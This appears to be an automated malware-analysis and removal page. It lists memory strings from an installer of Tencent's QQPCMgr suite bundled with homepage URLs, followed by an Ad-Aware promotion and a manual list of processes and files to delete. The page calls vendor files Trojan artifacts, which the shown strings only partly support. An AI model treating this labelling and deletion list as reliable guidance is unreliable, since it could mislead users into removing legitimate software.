hXXps://d.symcb.com/cps0%
hXXps://d.symcb.com/rpa0
hXXp://sf.symcd.com0&
hXXp://sf.symcb.com/sf.crt0
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="2345.com" type="win32"></assemblyIdentity><description>2345.com</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"><security><requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>
DefaultIE="%s"
QQPCMgr_Setup.exe
VVV.hao123.com/?tn=94742424_hao_pg
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\qqpcmgr_v11.4.17339.217_90008_Silence.exe
hXXp://c.pc.qq.com/fcgi-bin/packconfig?ServiceID=%d&ClientVer=%I64d&guid=%s
%s:%d
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; QQPCMgr7.0)
HTTP/1.1
@winhttp.dll
bugreport.exe
bugreport /buginfo:%p:%p:%p:%lu
\StringFileInfo\xx\FileDescription
\StringFileInfo\xx\FileVersion
\StringFileInfo\xx\ProductName
%s[%u,%u];
RestallForBugReport
{677B9715-5692-49f6-979F-CD11EC963EFE}
runexe
runexeargv
%SYSTEM%
%WINDOWS%
%CUR_MODULE%
%CUR_EXE_MODULE%
%CUR_DIR%
SOFTWARE\Tencent\PlatForm_Type_List\%d
Bin\QQ.exe
*?$"<>|;%
Time.dat
UninstTime.dat
dr.dll
QQPCMgrDaemon.exe
\StringFileInfo\xx\%s
Info.ini
%u.%u.%u.%u
%s.%s.%s.%s
setup.xml
UpdateTrayIcon.exe
TXSSOSetup.exe
PackageConf.dll
QQPCRTP.exe
dmmon.dll
AcLayers.dll
QMGuide11.txt
QMGuide.exe
QQPCTray.exe
QMPacket.dat
install.tmp
IsShow
QQPCWSCController.exe
QQPCMgrUpdate.exe
Uninst.exe
RunApp::QQPCMGRDaemon.exe:return %d
InstallDirNew:%s
Uninst.exe:return %d
QQRepair.exe
&ParentProcessID=%d
Global\09be3af8-865a-467c-ba47-d27ff7d1b1bb
Global\08afce87-a56e-4c2f-bb18-bc96365be41a
QQPCDetector\dr.dll
QMCheckKill4suzi.ini
QMSystemSetup_7*.exe
s{C0F87C1E-7FD0-4b43-99BD-C6386C56F41E}
QQPCRtp.exe
SYSTEM\CurrentControlSet\services\QQPCRTP
QQRepair.exetmp
\\.\Global\%s
\\.\%s
QQPCmgrInstallGuide.exe
hXXp://hao.qq.com/?unc=o400493_1&s=2
hXXp://hao.qq.com/?unc=o400493_1&s=1
2345.com
baidu.com
sina.com.cn
163.com
sohu.com
qq.com
ifeng.com
package.dat
pkgdll.dat
g-t QQPCTray.exe -c 1
QMConfig.hiv
TrojanCloudAutoReport
FZLTCXHJW.TTF
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
RCD_AppInit.dll
suxtheme.dll
PacketExe
epluginctrl.xml
d%s.bad
%u ms,
TestMSVCR.exe
TestMSVCR_64.exe
InstAsm.exe
TestMSVCR.exe"
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
{591D514A-55C0-5EE0-0E7A-1375D65E910A}
write UpdateStatus,return: %d
\\.\C:
%s-%d
msimg32.dll
"%s" %s
Psapi.dll
sKernel32.dll
QQPCRTP
Advapi32.dll
QQ.exe
remotecontrol.dll
H%d%%
%d MB
%d MB
0,-37,-0,-22
0,-125,-0,-110
1,-106,-1,-1
0,-100,-0,-85
1,-81,-1,-1
D%s%s
QQPCMgr.exe
QQPCMgr.rdb
GF.dll
crc.dat
%s.bad%u
%s.tmp
%s\%s
Global\{0866A22D-7233-42e1-9EFB-6EDE8A9AC6ED}
\kernel32.dll
G0.0.0.0
\\.\PhysicalDrive0
InitReport...
FinalizeReport...
Siphlpapi.dll
Global\BFD88F2D-0990-4de4-AD0F-764F5894389A-%d
[%d][ddd d:d:d:d] : %s
TFsFlt.sys
Tfsfltx64.sys
TSDefenseBt.sys
TsFltMgr.sys
TSysCare.sys
TSysCare64.sys
QQPCUrlLoader.exe
QMTFunction::RunApp CreateProcessW error:%d, wait:%d, show:%d, path:%ws, cmd:%s
%s%sdddddd.Log
C:\%s.Log
Copy File [%s] => [%s]
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
QMUIRES.dat
Download\Report.Ini
DoIsShowTips
Wtsapi32.dll
Netsh.exe
QQPCtray.exe
kismain.exe
kisuisp.exe
kxetray.exe
kislive.exe
QQPCDownloader_PropData_%d
K##operator=%d;supplyid=%d
QQPCDetector.dll
History.ini
QQPCDownload.exe
%s ##cmd=1;supplyid=%d;target=%d;cgi=%s;productname=%s;
##cmd=1;supplyid=%d;target=%d;cgi=%s;productname=%s;
dlcore.dll
hXXp://c.pc.qq.com/fcgi-bin/xmldownurlquery?id=%d&guid=%s&dm=%d
QQPCDownloadModule.xml
%s%s%s
SYSTEM\CurrentControlSet\services\%s
CreateDownloader. uiCustomID = %d
strFilePath = %s
uiCustomID = %d
CDownload::IsWorking(). m_bInited = %d
strUrl = %s
strFileName = %s
CDownload::DeleteTask(). uiTaskID = %d
CDownload::HandleDeleteTask(). uiTaskID = %d
CDownload::DeleteTask(). strUrl = %s
CDownload::HandleDeleteTask(). strUrl = %s
CDownload::SetDownloadSpeed(). uiSpeed = %d
CDownload::SetP2PUploadSpeed(). uiSpeed = %d
CDownload::HandleSetP2PUploadSpeed(). uiSpeed = %d
CDownload::SetSafeMode(). bSafeMode = %d
CDownload::HandleSetSafeMode(). bSafeMode = %d
stProxyInfo.eProxyType = %d
stProxyInfo.strProxyIP = %s
stProxyInfo.usProxyPort = %d
CDownload::OnNotify()->OnDownloadComplete. uiTaskID = %d, uiResult = %d, uiErrorCode = %d, uiDetailErrorCode = %d
DownloadProxy.Downloader.1
Jxxxxxxxxxxxxxxxx
namedpipe
\\.\pipe\
ntdll.dll
Tencentdl.exe
{%X-%X-%X-%X-%X%X}
CLSID\%s\LocalServer32
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360
QMUIRES.DAT
RunApp::QQReapir.exe:return: %d
QQPCTray.exe" /regrun
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
InstallDirNew:%s,InstallDirOld::%s
LogName:%s,ParentProcessID:%d,UpdateStatus:%s
2:old):%d
@TFsFlt.sys
E.com
\Global.db
iphlpapi.dll
\\.\PhysicalDrive%d
\\.\Scsi%d:
8.3.9874.215
8,3,9874,215
11.4.17339.217
QQPCMgrPacket.exe
0, 0, 0, 0
SendStat.exe

QQPCRTP.exe_2728:

.text
`.rdata
@.data
.rsrc
@.reloc
D:\jenkins_Trunk\workspace\Mainline_SourceJob_2\qqpcmgr_proj\FTHardware\QMPublicExe\QMService\QMRtpSvc.cpp
masterconn11.qq.com
CRTPServer::SetConfigChangeEvent Receive Config Change Message!
D:\jenkins_Trunk\workspace\Mainline_SourceJob_2\qqpcmgr_proj\FTHardware\QMPublicExe\QMService\RTPServer.cpp
CRTPServer::OnConfigChanged Begin Unload Plugins!
CRTPServer::OnConfigChanged Begin Load Plugins!
RtpPerfLog: StartTray: CReportManager::GetInstance().Initialize() bRet = %d
RtpPerfLog: CRTPServer StartSystemModules begin
RtpPerfLog: CRTPServer StartSystemModules end
RtpPerfLog: StartTray: CReportManager::GetInstance().Report() bRet = %d
CRTPServer::Delay_ReportTrayStartInfor
CRTPServer::MainWorkThread_PostQuitMsg
CRTPServer::MainWorkThread_ConfigChange
D:\jenkins_Trunk\workspace\Mainline_SourceJob_2\qqpcmgr_proj\FTHardware\QMPublicExe\QMService\Service.cpp
RtpPerfLog: entering Handler(%d)
RtpPerfLog: leaving Handler(%d)
Init start value %d
D:\jenkins_Trunk\workspace\Mainline_SourceJob_2\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMPerfMon\QMPerfMon.cpp
InsertPerfMonItem: [error] start value %d
InitPerfMon [ok]: module:%s
InitPerfMon [error]: module:%s
PerfMonFromStart :bSucc:%d Id:%d Session:%d module:%s
D:\jenkins_Trunk\workspace\Mainline_SourceJob_2\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMFramework\Core\PluginManager.cpp
UnloadPlugins: Name :%ws, UnloadTime: %d
QQLogin
(%d.%d) d:d:d.d %s_%s:d(K): %s
(%d) d:d:d.d %s_%s: %s
(M) d:d:d.d ||
CreateIReportClient
ReleaseIReportClient
D:\jenkins_Trunk\workspace\Mainline_SourceJob_2\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMReportMgr\QMReportMgr.cpp
InitCommonData, ProductID=%d, ClientVersion=%I64d
QMEnumLoginQQ
D:\jenkins_Trunk\workspace\Mainline_SourceJob_2\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMCommonlib\QMCommon.cpp
Get function "%s" address failed.
D:\jenkins_Trunk\workspace\Mainline_SourceJob_2\qqpcmgr_proj\Basic\Output\BinFinal\QQPCRTP.pdb
VERSION.dll
WS2_32.dll
GetProcessHeap
KERNEL32.dll
MsgWaitForMultipleObjects
MsgWaitForMultipleObjectsEx
USER32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegFlushKey
RegEnumKeyExW
RegNotifyChangeKeyValue
RegGetKeySecurity
RegSetKeySecurity
RegQueryInfoKeyW
ADVAPI32.dll
PSAPI.DLL
MSVCP80.dll
MSVCR80.dll
_amsg_exit
_crt_debugger_hook
WTSAPI32.dll
SHLWAPI.dll
USERENV.dll
QQPCRTP.exe
.?AV?$RunnableMethod@P8CRTPServer@@AEHXZUTuple0@@@?$ScopedRunnableMethodFactory@VCRTPServer@@@qmbase@@
.?AV?$RunnableMethod@P8CRTPServer@@AEXXZUTuple0@@@?$ScopedRunnableMethodFactory@VCRTPServer@@@qmbase@@
.?AV?$CQMIpcRequestHandle@VCRTPServer@@@IPC@@
.?AV?$ScopedRunnableMethodFactory@VCRTPServer@@@qmbase@@
.?AV?$CSingleton@VCRTPServer@@@QMUtils@@
.?AVCRTPServer@@
.?AVCQMIpcPipe@IPC@@
.PA_W
.?AV?$CSingleton@VCReportManager@QMReportMgr@@@utils@@
.?AVCReportManager@QMReportMgr@@
4.17339.217\QQPCRTP.exe
77777777777
()))....
89(95((0
<assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
; <,<;<^<
0)030]0{0
3-424@4`4
:";5;:;\;};
< <$<(<,<0<4<8<<< ?$?(?,?
< ?<?@?\?`?
explorer.exe
bugreport.exe
bugreport /buginfo:%p:%p:%p:%lu
\StringFileInfo\xx\FileDescription
\StringFileInfo\xx\FileVersion
\StringFileInfo\xx\ProductName
QQFileFlt.dll
\\.\Global\%s
\\.\%s
QQPCMgr.exe
"{0}\{1}"
QQPCRtp
\Imm32.dll
\ptrate.dll
QQPCRTP
Global\{9F07EDA1-EF07-47e7-A7EE-59069A1247DD}
QQPCTray.exe
"{0}\{1}" {2}
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
SOFTWARE\Microsoft\Windows\CurrentVersion
QMHips.dll
QMHipsEngine.dll
!QMRtpCheck.dll
%s\%s
\QMDns.dll
..\scc.dll
..\TAVEng.dll
QMSafeboxPlugin.dll
..\QQPCHardware.dll
..\QMFileMon.dll
..\TAVCache.dll
..\QMUl.dll
QMRepairPlugin.dll
QQPCNetFlow.exe
Global\com.tencent.qqpcmgr.sysoptimize.single.mutex
QQPCSysOptimize.exe
Global\{8C0CCCAE-1B9C-4c93-96BC-F8DE034FB952}
sqlite.dll
QMTrayPlugin\QMPerfCtrl\QMPerf.dll
eGlobal\TAV_SERVICE_{4A9CAFF9-6834-419c-AFB1-139AC49FF55E}
SYSTEM\CurrentControlSet\services\QQPCRTP
{04CE0CB6-CDF3-4a4b-8B9D-292A455FAF5B}
"{0}\{1}"
{E11173AE-6007-4a43-811E-6069470B72E6}
{84B48DA1-935E-457d-9566-68C2222F9609}
QQPCMgrUpdate.exe
"{0}\{1}{2}" {3}
QQPCTAVSrv.exe
QQPCUpdateAVLib.exe
QQPCClinic.exe
QMSafeShut.exe
ntdll.dll
EXPLORER.EXE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
QQPCLeakScan.exe
"{0}\{1}" {2} {3}
\RefuseInject.dll
AperfLogConf.ini
Global\{A4F31C01-A8C8-40ba-BC77-7E8BF6049F58}
Global\{388F581B-10BF-4918-8A80-565FDC0D6D2D}
Global\{2FF8DD38-1192-4fde-BCDA-C20DB962F403}
QMIpc.dll
@QMWebFW.DLL
RtpPerfLog: before loading %s
pRtpPerfLog: after loading %s
RtpPerfLog: before init %s
RtpPerfLog: after init %s
SendLoopbackMessage FAILED, MSGID:{0}, Reason: Service disabled
PostLoopbackMessage FAILED, MSGID:{0}, Reason: Service disabled
PostLoopbackMessage FAILED, MSGID:{0}
/{0}/{1}/{2}
SendIpcMessage Begin, MSGID:{0}, TARGET:{1}
SendIpcMessage FAILED, MSGID:{0}, TARGET:{1}, Reason: Service disabled
PostIpcMessage FAILED, MSGID:{0}, TARGET:{1}, Reason: Service disabled
/%d/%d/%d
PipeServer::ReleaseTunnel()
0 is an invalid value for completionKey
Pipe Broken
CIOCompletionPort::PostStatus() - PostQueuedCompletionStatus
Global\{17ED6DA0-0902-461c-B763-F00FF209066B}
Global\{FA6FBBB1-8C8E-43b1-B8EC-35573A94C231}
ErrLogFile.log
C:\ErrLogFile.log
QQQuickLoginInfo
QQLoginInfo
Failed to call RtlGetVersion(), err=%d, RtlGetVersion=%p
Windows version: %d.%d.%d (sp %d)
okernel32.dll
dr.dll
%u.%u.%u.%u
11.4.17339.217
QMCommon.dll
Load QMCommon.dll failed, path=%S
11,4,17339,217

QQPCTray.exe_2820:

.text
`.rdata
@.data
.rsrc
@.reloc
L$ QSShP
D:\jenkins_Trunk\workspace\Mainline_SourceJob_2\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMCommonlib\QMCommon.cpp
Get function "%s" address failed.
Init start value %d
D:\jenkins_Trunk\workspace\Mainline_SourceJob_2\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMPerfMon\QMPerfMon.cpp
InsertPerfMonItem: [error] start value %d
InitPerfMon [ok]: module:%s
InitPerfMon [error]: module:%s
PerfMonDuring bSucc:%d Id:%d Session:%d module:%s
QQLogin
(%d.%d) d:d:d.d %s_%s:d(K): %s
(%d) d:d:d.d %s_%s: %s
(M) d:d:d.d ||
D:\jenkins_Trunk\workspace\Mainline_SourceJob_2\qqpcmgr_proj\Basic\Output\BinFinal\QQPCTray.pdb
SHLWAPI.dll
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
MSVCP80.dll
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
PSAPI.DLL
.17339.217\QQPCTray.exe
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="QQPCMgr" processorArchitecture="X86" type="win32" version="1.0.0.0"></assemblyIdentity><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.VC80.ATL" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity></dependentAssembly></dependency></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
>$>*>3>=>~>
3 7$7(7,707
3 3$3<3@3`3
Global\{88B0D764-B5C3-4c4a-958F-B76524517744}
Global\{00B0D764-B5C4-414a-458F-993573939483}
\ptrate.dll
QMMain.dll
QQPCMgr.rdb
QQPCCommonMgr.rdb
\RefuseInject.dll
sAppLaunch.%d.prf
AppLaunch.prf
Num of Files:%d
Num of Sec:%d, File:%s
Rec d info size:%d
AppPrefLog.log
QMCommon.dll
Load QMCommon.dll failed, path=%S
QQPCMgr.exe
QQPCTray.exe
QQPCRTP.exe
perfLogConf.ini
Global\{A4F31C01-A8C8-40ba-BC77-7E8BF6049F58}
Global\{388F581B-10BF-4918-8A80-565FDC0D6D2D}
Global\{2FF8DD38-1192-4fde-BCDA-C20DB962F403}
Global\{17ED6DA0-0902-461c-B763-F00FF209066B}
Global\{FA6FBBB1-8C8E-43b1-B8EC-35573A94C231}
ErrLogFile.log
C:\ErrLogFile.log
11.4.17339.217
11,4,17339,217

QQPCTray.exe_2820_rwx_02C20000_00001000:

lsl.exe

QQPCTray.exe_2820_rwx_02C8B000_00001000:

\PIPE\lsarpc
oleaut32.dll
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning
"%Program Files%\Tencent\QQPCMgr\11.4.17339.217\\QMDeskTopGC.exe" /file="%1"
\\?\FDC#GENERIC_FLOPPY_DRIVE#6&1435b2e2&0&0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    QQPCMgr_Setup.exe:1648
    05a00036.exe:304
    sc.exe:1804
    InstAsm.exe:464
    qqpcmgr_v11.4.17339.217_90008_Silence.exe:296
    cacls.exe:876

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCXPNOTIFY.exe (4078 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_529.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCFixOpHelper.EXE (4520 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\BNSConfig.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSysOptimize.dat (848 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameAssistant.dat (720 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_890.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1026.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSVulInf.Dat (323 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMSCEntrancePlugin\QMSCEntrancePlugin.dll (4254 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAVEng.dll (5668 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\TestMSVCR_64.exe (16 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMMobileTrayPlugin\QMMobileTrayPlugin.dll (6309 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1082.dat (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMFileMonFrc.dat (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\PluginInfo.xml (37 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\libpng.dll (1172 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSSO\Bin\SSOLUIControl.dll (5788 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\PersonaLib.dat (9 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMCmcTrayPlugin\QMCmcTrayPlugin.dll (4375 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\DownloaderInfo.dat (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\npQMExtensionsIE.dll (1743 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSSysKitProxy.dll (1144 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TestStubConfig.xml (425 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCLeakScan\QQPCLeakScan.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1102.dat (455 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysCleanPage\SysCleanPage.dll (6042 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSSO\I18N\2052\SSOStringBundle.xml (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMSCEntrancePlugin\QMSCEntrancePlugin.tpc (661 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\QMNetMon.rdb (36 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\router_config.xml (55 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMSysSlim.png (691 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\TestMSVCR.exe (16 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPConfig.rdb (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.CRT\8.0.50727.4053.cat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCHardware.dll (3349 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDLP.exe (7600 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCRealTimeSpeedup.exe (6787 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCmgrInstallGuide.rdb (141 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\PluginInstaller.exe (1610 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmavtrayplugin\QMShield48.png (890 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\tinyxml.dll (1057 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\AppLaunch.32.prf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1008.dat (624 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\UninstallScan.etf (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\NetMon.png (424 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRtpController.dll (2211 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysHomePage\SysHomePage.dll (13283 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMWebFWCfg.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_130.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1098.dat (454 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\vircmpinfo.def (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMMobileSettingCenter\QMMobileSettingCenter.rdb (62 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\TraceClear\TraceClear.rdb (158 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\DlForQd.dll (2559 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\QMAutoTaskPlugin.tpc (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\jgIOStub.dll (14 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QuickOpenLogo\QQPCB2AndroidJmp_QO.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\sm04.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_571.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\ProcessLogDll.dll (1536 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virscr05.def (2 bytes)
